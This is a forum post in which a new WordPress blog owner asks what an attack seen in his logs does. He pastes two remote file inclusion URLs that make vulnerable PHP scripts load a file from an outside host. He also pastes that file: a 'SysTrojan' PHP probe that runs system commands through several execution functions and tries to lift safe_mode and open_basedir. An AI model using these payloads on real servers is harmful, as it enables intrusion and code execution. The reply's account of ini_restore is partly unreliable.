Someone tried to run it on my WP blog, can anybody explain what does it do? It was run like www.MYBLOG.com/show.php?PollDir=http://ingenieria.unilibrecali.edu.co/bot.txt?? Code (markup): and www.MYBLOG.com/authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://ingenieria.unilibrecali.edu.co/bot.txt?? Code (markup): <html><head><title>SysTrojan</title></head><body bgcolor=DC143C> <H1>Wrong Place</H1> </html></head></body> <?php if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){ echo("Safe Mode of this Server is : "); echo("SafemodeOFF"); } else{ ini_restore("safe_mode"); ini_restore("open_basedir"); if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){ echo("Safe Mode of this Server is : "); echo("SafemodeOFF"); }else{ echo("Safe Mode of this Server is : "); echo("SafemodeON"); } } function ex($cfe){ $res = ''; if (!empty($cfe)){ if(function_exists('exec')){ @exec($cfe,$res); $res = join("\n",$res); } elseif(function_exists('shell_exec')){ $res = @shell_exec($cfe); } elseif(function_exists('system')){ @ob_start(); @system($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(function_exists('passthru')){ @ob_start(); @passthru($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(@is_resource($f = @popen($cfe,"r"))){ $res = ""; while(!@feof($f)) { $res .= @fread($f,1024); } @pclose($f); } } return $res; } exit; ?> PHP:
This script tries to remove safe_mode and open_basedir restrictions using "ini_restore" function, saving it in php.ini file. See more here.
I just checked my latest visitors and there it was. My blog is new one so there aren't many visitors yet.